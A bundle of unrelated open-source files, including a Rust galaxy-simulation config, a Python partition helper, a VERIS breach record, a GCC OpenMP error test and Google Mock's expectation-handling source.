pub safety: f64,
pub constructions: Vec<Construction>,
}
#[derive(Deserialize, Clone, Debug)]
/// Description of a (group of) particles.
pub enum Construction {
Particle {
pos: [f32; 3],
vel: [f32; 3],
mass: f64,
},
Galaxy {
center_pos: [f32; 3],
center_vel: [f32; 3],
center_mass: f64,
amount: u32,
normal: [f32; 3],
},
}
impl Config {
/// Build the actual particles from the constructions.
pub fn construct_particles(&self) -> Vec<Particle> {
let mut particles = Vec::new();
// Those with mass first
for c in &self.constructions {
particles.push(match c {
Construction::Particle { pos, vel, mass } => {
Particle::new((*pos).into(), (*vel).into(), *mass, 1.0)
}
Construction::Galaxy {
center_pos,
center_vel,
center_mass,
..
} => Particle::new(
(*center_pos).into(),
(*center_vel).into(),
*center_mass,
1.0,
),
})
}
// Particles without mass last
for c in &self.constructions {
if let Construction::Galaxy {
center_pos,
center_vel,
center_mass,
amount,
normal,
} = c
{
galaxygen::generate_galaxy(
&mut particles,
*amount,
self.safety,
(*center_pos).into(),
(*center_vel).into(),
*center_mass,
(*normal).into(),
);
}
}
particles
}
}
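// Illustrative usage (hypothetical values, not part of the original module):
//
//     let cfg = Config {
//         camera_pos: [0.0, 0.0, -50.0],
//         safety: 0.1,
//         constructions: vec![Construction::Galaxy {
//             center_pos: [0.0, 0.0, 0.0],
//             center_vel: [0.0, 0.0, 0.0],
//             center_mass: 1e6,
//             amount: 10_000,
//             normal: [0.0, 1.0, 0.0],
//         }],
//     };
//     // one massive center particle plus the generated (massless) stars
//     let particles = cfg.construct_particles();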
| {
"pile_set_name": "Github"
} |
module A { header "A.h" }
module B { header "B.h" }
module Common { header "Common.h" }
| {
"pile_set_name": "Github"
} |
r"""Draw a random partition."""
import numpy as np
from numpy.random import dirichlet
def draw_bkps(n_samples=100, n_bkps=3):
"""Draw a random partition with specified number of samples and specified number of changes."""
alpha = np.ones(n_bkps + 1) / (n_bkps + 1) * 2000
bkps = np.cumsum(dirichlet(alpha) * n_samples).astype(int).tolist()
bkps[-1] = n_samples
return bkps
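# Illustrative call (editorial note): the values are random, but the list is
# sorted, has n_bkps + 1 entries, and always ends at n_samples, e.g.
#   >>> draw_bkps(n_samples=100, n_bkps=3)
#   [26, 53, 77, 100]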
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import <objc/NSObject.h>
@class CALayer;
@protocol OS_dispatch_queue, OS_xpc_object;
@interface DPRemoteDesktopPicture : NSObject
{
NSObject<OS_xpc_object> *_connection;
NSObject<OS_dispatch_queue> *_queue;
unsigned int _did;
CALayer *_desktopPictureLayer;
}
+ (void)queue:(id)arg1 remoteDesktopPictureForDisplay:(unsigned int)arg2 block:(CDUnknownBlockType)arg3;
@property(readonly) CALayer *desktopPictureLayer; // @synthesize desktopPictureLayer=_desktopPictureLayer;
- (void).cxx_destruct;
- (void)invalidate;
- (void)dealloc;
- (id)_initWithDisplay:(unsigned int)arg1 queue:(id)arg2 andBlock:(CDUnknownBlockType)arg3;
@end
| {
"pile_set_name": "Github"
} |
{
"action": {
"error": {
"variety": [
"Misdelivery"
],
"vector": [
"Unknown"
]
}
},
"actor": {
"internal": {
"motive": [
"NA"
],
"variety": [
"Unknown"
]
}
},
"asset": {
"assets": [
{
"variety": "M - Documents"
}
],
"cloud": [
"Unknown"
]
},
"attribute": {
"availability": {
"variety": [
"Loss"
]
},
"confidentiality": {
"data": [
{
"amount": 967,
"variety": "Medical"
}
],
"data_disclosure": "Yes",
"data_total": 967,
"data_victim": [
"Patient"
],
"state": [
"Stored unencrypted"
]
}
},
"discovery_method": {
"unknown": true
},
"impact": {
"overall_rating": "Unknown"
},
"incident_id": "FBDCDE9F-B47B-41B6-B79B-46DCAE8FB94E",
"plus": {
"analysis_status": "Finalized",
"analyst": "swidup",
"attribute": {
"confidentiality": {
"credit_monitoring": "Unknown"
}
},
"created": "2016-07-13T01:25:00Z",
"dbir_year": 2017,
"github": "6909",
"master_id": "D9414626-1FD7-4500-8C66-3F91532A376E",
"modified": "2016-07-13T01:33:00Z",
"sub_source": "phidbr",
"timeline": {
"notification": {
"day": 28,
"month": 12,
"year": 2015
}
}
},
"reference": "http://ijpr.org/post/personal-info-hundreds-oregon-veterans-compromised#stream/0",
"schema_version": "1.3.4",
"security_incident": "Confirmed",
"source_id": "vcdb",
"summary": "The Oregon Department of Veterans' Affairs says the personal information of hundreds of veterans may have been compromised. ODVA Director Cameron Smith said discharge and release papers may have been in the possession of an unauthorized person, but so far there's no evidence of misuse. \"A full investigation is pending _ but it appears that 967 veterans' personal information was shared outside of our control with an individual outside of our agency,\" said Smith. He said the information was in paper form, not digital. The ODVA is letting veterans know about the problem and offering free credit services because the forms contained social security numbers, dates of birth, addresses and full names.",
"timeline": {
"incident": {
"year": 2015
}
},
"victim": {
"country": [
"US"
],
"employee_count": "Over 100000",
"industry": "923120",
"region": [
"019021"
],
"state": "DC",
"victim_id": "Veterans Health Administration"
}
} | {
"pile_set_name": "Github"
} |
/* { dg-do compile } */
/******************************************************************************
* OpenMP Example - Combined Parallel Loop Work-sharing - C/C++ Version
* FILE: omp_workshare3.c
* DESCRIPTION:
* This example attempts to show use of the parallel for construct. However
* it will generate errors at compile time. Try to determine what is causing
* the error. See omp_workshare4.c for a corrected version.
* SOURCE: Blaise Barney 5/99
* LAST REVISED: 03/03/2002
******************************************************************************/
#include <omp.h>
#include <stdio.h>
#define N 50
#define CHUNKSIZE 5
int
main () {
int i, chunk, tid;
float a[N], b[N], c[N];
/* Some initializations */
for (i=0; i < N; i++)
a[i] = b[i] = i * 1.0;
chunk = CHUNKSIZE;
#pragma omp parallel for \
shared(a,b,c,chunk) \
private(i,tid) \
schedule(static,chunk)
{ /* { dg-error "expected" } */
tid = omp_get_thread_num();
for (i=0; i < N; i++)
{
c[i] = a[i] + b[i];
printf("tid= %d i= %d c[i]= %f\n", tid, i, c[i]);
}
} /* end of parallel for construct */
return 0;
}
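/*
 * Editorial note: the diagnostic above fires because a combined "parallel for"
 * directive must be followed immediately by a for statement, not by a compound
 * { } block. A corrected sketch (cf. omp_workshare4.c):
 *
 *   #pragma omp parallel for shared(a,b,c,chunk) private(i,tid) schedule(static,chunk)
 *   for (i = 0; i < N; i++)
 *     {
 *       tid = omp_get_thread_num();
 *       c[i] = a[i] + b[i];
 *       printf("tid= %d i= %d c[i]= %f\n", tid, i, c[i]);
 *     }
 */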
| {
"pile_set_name": "Github"
} |
libavcodec/pcm-dvd.o: libavcodec/pcm-dvd.c libavcodec/avcodec.h \
libavutil/samplefmt.h libavutil/avutil.h libavutil/common.h \
libavutil/attributes.h libavutil/macros.h libavutil/version.h \
libavutil/avconfig.h config.h libavutil/intmath.h libavutil/mem.h \
libavutil/error.h libavutil/internal.h libavutil/timer.h libavutil/log.h \
libavutil/cpu.h libavutil/dict.h libavutil/pixfmt.h libavutil/libm.h \
libavutil/intfloat.h libavutil/mathematics.h libavutil/rational.h \
libavutil/attributes.h libavutil/avutil.h libavutil/buffer.h \
libavutil/cpu.h libavutil/channel_layout.h libavutil/dict.h \
libavutil/frame.h libavutil/buffer.h libavutil/samplefmt.h \
libavutil/log.h libavutil/pixfmt.h libavutil/rational.h \
libavcodec/version.h libavutil/version.h libavcodec/bytestream.h \
libavutil/avassert.h libavutil/common.h libavutil/intreadwrite.h \
libavutil/bswap.h libavcodec/internal.h libavutil/mathematics.h
| {
"pile_set_name": "Github"
} |
package nl.joery.demo.animatedbottombar
import android.content.res.Resources
import kotlin.math.roundToInt
internal val Int.dp: Int
get() = (this / Resources.getSystem().displayMetrics.density).roundToInt()
internal val Int.sp: Int
get() = (this / Resources.getSystem().displayMetrics.scaledDensity).roundToInt()
internal val Int.dpPx: Int
get() = (this * Resources.getSystem().displayMetrics.density).roundToInt()
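// Illustrative (assuming a display density of 2.0): 16.dpPx == 32 and 32.dp == 16.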
internal val Int.spPx: Int
get() = (this * Resources.getSystem().displayMetrics.scaledDensity).roundToInt() | {
"pile_set_name": "Github"
} |
:pserver:[email protected]:/cvsroot/tclbitprint
| {
"pile_set_name": "Github"
} |
// Copyright 2007, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// Author: [email protected] (Zhanyong Wan)
// Google Mock - a framework for writing C++ mock classes.
//
// This file implements the spec builder syntax (ON_CALL and
// EXPECT_CALL).
#include "gmock/gmock-spec-builders.h"
#include <stdlib.h>
#include <iostream> // NOLINT
#include <map>
#include <set>
#include <string>
#include "gmock/gmock.h"
#include "gtest/gtest.h"
#if GTEST_OS_CYGWIN || GTEST_OS_LINUX || GTEST_OS_MAC
# include <unistd.h> // NOLINT
#endif
namespace testing {
namespace internal {
// Protects the mock object registry (in class Mock), all function
// mockers, and all expectations.
GTEST_API_ GTEST_DEFINE_STATIC_MUTEX_(g_gmock_mutex);
// Logs a message including file and line number information.
GTEST_API_ void LogWithLocation(testing::internal::LogSeverity severity,
const char* file, int line,
const string& message) {
::std::ostringstream s;
s << file << ":" << line << ": " << message << ::std::endl;
Log(severity, s.str(), 0);
}
// Constructs an ExpectationBase object.
ExpectationBase::ExpectationBase(const char* a_file,
int a_line,
const string& a_source_text)
: file_(a_file),
line_(a_line),
source_text_(a_source_text),
cardinality_specified_(false),
cardinality_(Exactly(1)),
call_count_(0),
retired_(false),
extra_matcher_specified_(false),
repeated_action_specified_(false),
retires_on_saturation_(false),
last_clause_(kNone),
action_count_checked_(false) {}
// Destructs an ExpectationBase object.
ExpectationBase::~ExpectationBase() {}
// Explicitly specifies the cardinality of this expectation. Used by
// the subclasses to implement the .Times() clause.
void ExpectationBase::SpecifyCardinality(const Cardinality& a_cardinality) {
cardinality_specified_ = true;
cardinality_ = a_cardinality;
}
// Retires all pre-requisites of this expectation.
void ExpectationBase::RetireAllPreRequisites()
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
if (is_retired()) {
// We can take this short-cut as we never retire an expectation
// until we have retired all its pre-requisites.
return;
}
for (ExpectationSet::const_iterator it = immediate_prerequisites_.begin();
it != immediate_prerequisites_.end(); ++it) {
ExpectationBase* const prerequisite = it->expectation_base().get();
if (!prerequisite->is_retired()) {
prerequisite->RetireAllPreRequisites();
prerequisite->Retire();
}
}
}
// Returns true iff all pre-requisites of this expectation have been
// satisfied.
bool ExpectationBase::AllPrerequisitesAreSatisfied() const
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
for (ExpectationSet::const_iterator it = immediate_prerequisites_.begin();
it != immediate_prerequisites_.end(); ++it) {
if (!(it->expectation_base()->IsSatisfied()) ||
!(it->expectation_base()->AllPrerequisitesAreSatisfied()))
return false;
}
return true;
}
// Adds unsatisfied pre-requisites of this expectation to 'result'.
void ExpectationBase::FindUnsatisfiedPrerequisites(ExpectationSet* result) const
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
for (ExpectationSet::const_iterator it = immediate_prerequisites_.begin();
it != immediate_prerequisites_.end(); ++it) {
if (it->expectation_base()->IsSatisfied()) {
// If *it is satisfied and has a call count of 0, some of its
// pre-requisites may not be satisfied yet.
if (it->expectation_base()->call_count_ == 0) {
it->expectation_base()->FindUnsatisfiedPrerequisites(result);
}
} else {
// Now that we know *it is unsatisfied, we are not so interested
// in whether its pre-requisites are satisfied. Therefore we
// don't recursively call FindUnsatisfiedPrerequisites() here.
*result += *it;
}
}
}
// Describes how many times a function call matching this
// expectation has occurred.
void ExpectationBase::DescribeCallCountTo(::std::ostream* os) const
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
// Describes how many times the function is expected to be called.
*os << " Expected: to be ";
cardinality().DescribeTo(os);
*os << "\n Actual: ";
Cardinality::DescribeActualCallCountTo(call_count(), os);
// Describes the state of the expectation (e.g. is it satisfied?
// is it active?).
*os << " - " << (IsOverSaturated() ? "over-saturated" :
IsSaturated() ? "saturated" :
IsSatisfied() ? "satisfied" : "unsatisfied")
<< " and "
<< (is_retired() ? "retired" : "active");
}
// Checks the action count (i.e. the number of WillOnce() and
// WillRepeatedly() clauses) against the cardinality if this hasn't
// been done before. Prints a warning if there are too many or too
// few actions.
void ExpectationBase::CheckActionCountIfNotDone() const
GTEST_LOCK_EXCLUDED_(mutex_) {
bool should_check = false;
{
MutexLock l(&mutex_);
if (!action_count_checked_) {
action_count_checked_ = true;
should_check = true;
}
}
if (should_check) {
if (!cardinality_specified_) {
// The cardinality was inferred - no need to check the action
// count against it.
return;
}
// The cardinality was explicitly specified.
const int action_count = static_cast<int>(untyped_actions_.size());
const int upper_bound = cardinality().ConservativeUpperBound();
const int lower_bound = cardinality().ConservativeLowerBound();
bool too_many; // True if there are too many actions, or false
// if there are too few.
if (action_count > upper_bound ||
(action_count == upper_bound && repeated_action_specified_)) {
too_many = true;
} else if (0 < action_count && action_count < lower_bound &&
!repeated_action_specified_) {
too_many = false;
} else {
return;
}
::std::stringstream ss;
DescribeLocationTo(&ss);
ss << "Too " << (too_many ? "many" : "few")
<< " actions specified in " << source_text() << "...\n"
<< "Expected to be ";
cardinality().DescribeTo(&ss);
ss << ", but has " << (too_many ? "" : "only ")
<< action_count << " WillOnce()"
<< (action_count == 1 ? "" : "s");
if (repeated_action_specified_) {
ss << " and a WillRepeatedly()";
}
ss << ".";
Log(kWarning, ss.str(), -1); // -1 means "don't print stack trace".
}
}
// Implements the .Times() clause.
void ExpectationBase::UntypedTimes(const Cardinality& a_cardinality) {
if (last_clause_ == kTimes) {
ExpectSpecProperty(false,
".Times() cannot appear "
"more than once in an EXPECT_CALL().");
} else {
ExpectSpecProperty(last_clause_ < kTimes,
".Times() cannot appear after "
".InSequence(), .WillOnce(), .WillRepeatedly(), "
"or .RetiresOnSaturation().");
}
last_clause_ = kTimes;
SpecifyCardinality(a_cardinality);
}
// Points to the implicit sequence introduced by a living InSequence
// object (if any) in the current thread or NULL.
GTEST_API_ ThreadLocal<Sequence*> g_gmock_implicit_sequence;
// Reports an uninteresting call (whose description is in msg) in the
// manner specified by 'reaction'.
void ReportUninterestingCall(CallReaction reaction, const string& msg) {
// Include a stack trace only if --gmock_verbose=info is specified.
const int stack_frames_to_skip =
GMOCK_FLAG(verbose) == kInfoVerbosity ? 3 : -1;
switch (reaction) {
case kAllow:
Log(kInfo, msg, stack_frames_to_skip);
break;
case kWarn:
Log(kWarning,
msg +
"\nNOTE: You can safely ignore the above warning unless this "
"call should not happen. Do not suppress it by blindly adding "
"an EXPECT_CALL() if you don't mean to enforce the call. "
"See https://github.com/google/googletest/blob/master/googlemock/docs/CookBook.md#"
"knowing-when-to-expect for details.\n",
stack_frames_to_skip);
break;
default: // FAIL
Expect(false, NULL, -1, msg);
}
}
UntypedFunctionMockerBase::UntypedFunctionMockerBase()
: mock_obj_(NULL), name_("") {}
UntypedFunctionMockerBase::~UntypedFunctionMockerBase() {}
// Sets the mock object this mock method belongs to, and registers
// this information in the global mock registry. Will be called
// whenever an EXPECT_CALL() or ON_CALL() is executed on this mock
// method.
void UntypedFunctionMockerBase::RegisterOwner(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
{
MutexLock l(&g_gmock_mutex);
mock_obj_ = mock_obj;
}
Mock::Register(mock_obj, this);
}
// Sets the mock object this mock method belongs to, and sets the name
// of the mock function. Will be called upon each invocation of this
// mock function.
void UntypedFunctionMockerBase::SetOwnerAndName(const void* mock_obj,
const char* name)
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
// We protect name_ under g_gmock_mutex in case this mock function
// is called from two threads concurrently.
MutexLock l(&g_gmock_mutex);
mock_obj_ = mock_obj;
name_ = name;
}
// Returns the name of the function being mocked. Must be called
// after RegisterOwner() or SetOwnerAndName() has been called.
const void* UntypedFunctionMockerBase::MockObject() const
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
const void* mock_obj;
{
// We protect mock_obj_ under g_gmock_mutex in case this mock
// function is called from two threads concurrently.
MutexLock l(&g_gmock_mutex);
Assert(mock_obj_ != NULL, __FILE__, __LINE__,
"MockObject() must not be called before RegisterOwner() or "
"SetOwnerAndName() has been called.");
mock_obj = mock_obj_;
}
return mock_obj;
}
// Returns the name of this mock method. Must be called after
// SetOwnerAndName() has been called.
const char* UntypedFunctionMockerBase::Name() const
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
const char* name;
{
// We protect name_ under g_gmock_mutex in case this mock
// function is called from two threads concurrently.
MutexLock l(&g_gmock_mutex);
Assert(name_ != NULL, __FILE__, __LINE__,
"Name() must not be called before SetOwnerAndName() has "
"been called.");
name = name_;
}
return name;
}
// Calculates the result of invoking this mock function with the given
// arguments, prints it, and returns it. The caller is responsible
// for deleting the result.
UntypedActionResultHolderBase*
UntypedFunctionMockerBase::UntypedInvokeWith(const void* const untyped_args)
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
if (untyped_expectations_.size() == 0) {
// No expectation is set on this mock method - we have an
// uninteresting call.
// We must get Google Mock's reaction on uninteresting calls
// made on this mock object BEFORE performing the action,
// because the action may DELETE the mock object and make the
// following expression meaningless.
const CallReaction reaction =
Mock::GetReactionOnUninterestingCalls(MockObject());
// True iff we need to print this call's arguments and return
// value. This definition must be kept in sync with
// the behavior of ReportUninterestingCall().
const bool need_to_report_uninteresting_call =
// If the user allows this uninteresting call, we print it
// only when he wants informational messages.
reaction == kAllow ? LogIsVisible(kInfo) :
// If the user wants this to be a warning, we print it only
// when he wants to see warnings.
reaction == kWarn ? LogIsVisible(kWarning) :
// Otherwise, the user wants this to be an error, and we
// should always print detailed information in the error.
true;
if (!need_to_report_uninteresting_call) {
// Perform the action without printing the call information.
return this->UntypedPerformDefaultAction(untyped_args, "");
}
// Warns about the uninteresting call.
::std::stringstream ss;
this->UntypedDescribeUninterestingCall(untyped_args, &ss);
// Calculates the function result.
UntypedActionResultHolderBase* const result =
this->UntypedPerformDefaultAction(untyped_args, ss.str());
// Prints the function result.
if (result != NULL)
result->PrintAsActionResult(&ss);
ReportUninterestingCall(reaction, ss.str());
return result;
}
bool is_excessive = false;
::std::stringstream ss;
::std::stringstream why;
::std::stringstream loc;
const void* untyped_action = NULL;
// The UntypedFindMatchingExpectation() function acquires and
// releases g_gmock_mutex.
const ExpectationBase* const untyped_expectation =
this->UntypedFindMatchingExpectation(
untyped_args, &untyped_action, &is_excessive,
&ss, &why);
const bool found = untyped_expectation != NULL;
// True iff we need to print the call's arguments and return value.
// This definition must be kept in sync with the uses of Expect()
// and Log() in this function.
const bool need_to_report_call =
!found || is_excessive || LogIsVisible(kInfo);
if (!need_to_report_call) {
// Perform the action without printing the call information.
return
untyped_action == NULL ?
this->UntypedPerformDefaultAction(untyped_args, "") :
this->UntypedPerformAction(untyped_action, untyped_args);
}
ss << " Function call: " << Name();
this->UntypedPrintArgs(untyped_args, &ss);
// In case the action deletes a piece of the expectation, we
// generate the message beforehand.
if (found && !is_excessive) {
untyped_expectation->DescribeLocationTo(&loc);
}
UntypedActionResultHolderBase* const result =
untyped_action == NULL ?
this->UntypedPerformDefaultAction(untyped_args, ss.str()) :
this->UntypedPerformAction(untyped_action, untyped_args);
if (result != NULL)
result->PrintAsActionResult(&ss);
ss << "\n" << why.str();
if (!found) {
// No expectation matches this call - reports a failure.
Expect(false, NULL, -1, ss.str());
} else if (is_excessive) {
// We had an upper-bound violation and the failure message is in ss.
Expect(false, untyped_expectation->file(),
untyped_expectation->line(), ss.str());
} else {
// We had an expected call and the matching expectation is
// described in ss.
Log(kInfo, loc.str() + ss.str(), 2);
}
return result;
}
// Returns an Expectation object that references and co-owns exp,
// which must be an expectation on this mock function.
Expectation UntypedFunctionMockerBase::GetHandleOf(ExpectationBase* exp) {
for (UntypedExpectations::const_iterator it =
untyped_expectations_.begin();
it != untyped_expectations_.end(); ++it) {
if (it->get() == exp) {
return Expectation(*it);
}
}
Assert(false, __FILE__, __LINE__, "Cannot find expectation.");
return Expectation();
// The above statement is just to make the code compile, and will
// never be executed.
}
// Verifies that all expectations on this mock function have been
// satisfied. Reports one or more Google Test non-fatal failures
// and returns false if not.
bool UntypedFunctionMockerBase::VerifyAndClearExpectationsLocked()
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
bool expectations_met = true;
for (UntypedExpectations::const_iterator it =
untyped_expectations_.begin();
it != untyped_expectations_.end(); ++it) {
ExpectationBase* const untyped_expectation = it->get();
if (untyped_expectation->IsOverSaturated()) {
// There was an upper-bound violation. Since the error was
// already reported when it occurred, there is no need to do
// anything here.
expectations_met = false;
} else if (!untyped_expectation->IsSatisfied()) {
expectations_met = false;
::std::stringstream ss;
ss << "Actual function call count doesn't match "
<< untyped_expectation->source_text() << "...\n";
// No need to show the source file location of the expectation
// in the description, as the Expect() call that follows already
// takes care of it.
untyped_expectation->MaybeDescribeExtraMatcherTo(&ss);
untyped_expectation->DescribeCallCountTo(&ss);
Expect(false, untyped_expectation->file(),
untyped_expectation->line(), ss.str());
}
}
// Deleting our expectations may trigger other mock objects to be deleted, for
// example if an action contains a reference counted smart pointer to that
// mock object, and that is the last reference. So if we delete our
// expectations within the context of the global mutex we may deadlock when
// this method is called again. Instead, make a copy of the set of
// expectations to delete, clear our set within the mutex, and then clear the
// copied set outside of it.
UntypedExpectations expectations_to_delete;
untyped_expectations_.swap(expectations_to_delete);
g_gmock_mutex.Unlock();
expectations_to_delete.clear();
g_gmock_mutex.Lock();
return expectations_met;
}
} // namespace internal
// Class Mock.
namespace {
typedef std::set<internal::UntypedFunctionMockerBase*> FunctionMockers;
// The current state of a mock object. Such information is needed for
// detecting leaked mock objects and explicitly verifying a mock's
// expectations.
struct MockObjectState {
MockObjectState()
: first_used_file(NULL), first_used_line(-1), leakable(false) {}
// Where in the source file an ON_CALL or EXPECT_CALL is first
// invoked on this mock object.
const char* first_used_file;
int first_used_line;
::std::string first_used_test_case;
::std::string first_used_test;
bool leakable; // true iff it's OK to leak the object.
FunctionMockers function_mockers; // All registered methods of the object.
};
// A global registry holding the state of all mock objects that are
// alive. A mock object is added to this registry the first time
// Mock::AllowLeak(), ON_CALL(), or EXPECT_CALL() is called on it. It
// is removed from the registry in the mock object's destructor.
class MockObjectRegistry {
public:
// Maps a mock object (identified by its address) to its state.
typedef std::map<const void*, MockObjectState> StateMap;
// This destructor will be called when a program exits, after all
// tests in it have been run. By then, there should be no mock
// object alive. Therefore we report any living object as test
// failure, unless the user explicitly asked us to ignore it.
~MockObjectRegistry() {
// "using ::std::cout;" doesn't work with Symbian's STLport, where cout is
// a macro.
if (!GMOCK_FLAG(catch_leaked_mocks))
return;
int leaked_count = 0;
for (StateMap::const_iterator it = states_.begin(); it != states_.end();
++it) {
if (it->second.leakable) // The user said it's fine to leak this object.
continue;
// TODO([email protected]): Print the type of the leaked object.
// This can help the user identify the leaked object.
std::cout << "\n";
const MockObjectState& state = it->second;
std::cout << internal::FormatFileLocation(state.first_used_file,
state.first_used_line);
std::cout << " ERROR: this mock object";
if (state.first_used_test != "") {
std::cout << " (used in test " << state.first_used_test_case << "."
<< state.first_used_test << ")";
}
std::cout << " should be deleted but never is. Its address is @"
<< it->first << ".";
leaked_count++;
}
if (leaked_count > 0) {
std::cout << "\nERROR: " << leaked_count
<< " leaked mock " << (leaked_count == 1 ? "object" : "objects")
<< " found at program exit.\n";
std::cout.flush();
::std::cerr.flush();
// RUN_ALL_TESTS() has already returned when this destructor is
// called. Therefore we cannot use the normal Google Test
// failure reporting mechanism.
_exit(1); // We cannot call exit() as it is not reentrant and
// may already have been called.
}
}
StateMap& states() { return states_; }
private:
StateMap states_;
};
// Protected by g_gmock_mutex.
MockObjectRegistry g_mock_object_registry;
// Maps a mock object to the reaction Google Mock should have when an
// uninteresting method is called. Protected by g_gmock_mutex.
std::map<const void*, internal::CallReaction> g_uninteresting_call_reaction;
// Sets the reaction Google Mock should have when an uninteresting
// method of the given mock object is called.
void SetReactionOnUninterestingCalls(const void* mock_obj,
internal::CallReaction reaction)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_uninteresting_call_reaction[mock_obj] = reaction;
}
} // namespace
// Tells Google Mock to allow uninteresting calls on the given mock
// object.
void Mock::AllowUninterestingCalls(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
SetReactionOnUninterestingCalls(mock_obj, internal::kAllow);
}
// Tells Google Mock to warn the user about uninteresting calls on the
// given mock object.
void Mock::WarnUninterestingCalls(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
SetReactionOnUninterestingCalls(mock_obj, internal::kWarn);
}
// Tells Google Mock to fail uninteresting calls on the given mock
// object.
void Mock::FailUninterestingCalls(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
SetReactionOnUninterestingCalls(mock_obj, internal::kFail);
}
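// Illustrative sketch (MockTurtle is a hypothetical mock class): these three
// entry points are what the NiceMock, NaggyMock, and StrictMock wrappers rely
// on to select the reaction to uninteresting calls on a mock object.
//
//   testing::NiceMock<MockTurtle> nice;      // uninteresting calls are allowed
//   testing::NaggyMock<MockTurtle> naggy;    // uninteresting calls emit warnings
//   testing::StrictMock<MockTurtle> strict;  // uninteresting calls fail the test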
// Tells Google Mock the given mock object is being destroyed and its
// entry in the call-reaction table should be removed.
void Mock::UnregisterCallReaction(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_uninteresting_call_reaction.erase(mock_obj);
}
// Returns the reaction Google Mock will have on uninteresting calls
// made on the given mock object.
internal::CallReaction Mock::GetReactionOnUninterestingCalls(
const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
return (g_uninteresting_call_reaction.count(mock_obj) == 0) ?
internal::kDefault : g_uninteresting_call_reaction[mock_obj];
}
// Tells Google Mock to ignore mock_obj when checking for leaked mock
// objects.
void Mock::AllowLeak(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_mock_object_registry.states()[mock_obj].leakable = true;
}
// Verifies and clears all expectations on the given mock object. If
// the expectations aren't satisfied, generates one or more Google
// Test non-fatal failures and returns false.
bool Mock::VerifyAndClearExpectations(void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
return VerifyAndClearExpectationsLocked(mock_obj);
}
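// Illustrative usage sketch (MockTurtle, ExerciseFirstPhase, and the
// expectations below are hypothetical): verifying a long-lived mock part-way
// through a test, then setting fresh expectations on the same object.
//
//   MockTurtle turtle;
//   EXPECT_CALL(turtle, PenDown());
//   ExerciseFirstPhase(&turtle);
//   Mock::VerifyAndClearExpectations(&turtle);  // failures are reported here
//   EXPECT_CALL(turtle, PenUp());               // the mock can be reused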
// Verifies all expectations on the given mock object and clears its
// default actions and expectations. Returns true iff the
// verification was successful.
bool Mock::VerifyAndClear(void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
ClearDefaultActionsLocked(mock_obj);
return VerifyAndClearExpectationsLocked(mock_obj);
}
// Verifies and clears all expectations on the given mock object. If
// the expectations aren't satisfied, generates one or more Google
// Test non-fatal failures and returns false.
bool Mock::VerifyAndClearExpectationsLocked(void* mock_obj)
GTEST_EXCLUSIVE_LOCK_REQUIRED_(internal::g_gmock_mutex) {
internal::g_gmock_mutex.AssertHeld();
if (g_mock_object_registry.states().count(mock_obj) == 0) {
// No EXPECT_CALL() was set on the given mock object.
return true;
}
// Verifies and clears the expectations on each mock method in the
// given mock object.
bool expectations_met = true;
FunctionMockers& mockers =
g_mock_object_registry.states()[mock_obj].function_mockers;
for (FunctionMockers::const_iterator it = mockers.begin();
it != mockers.end(); ++it) {
if (!(*it)->VerifyAndClearExpectationsLocked()) {
expectations_met = false;
}
}
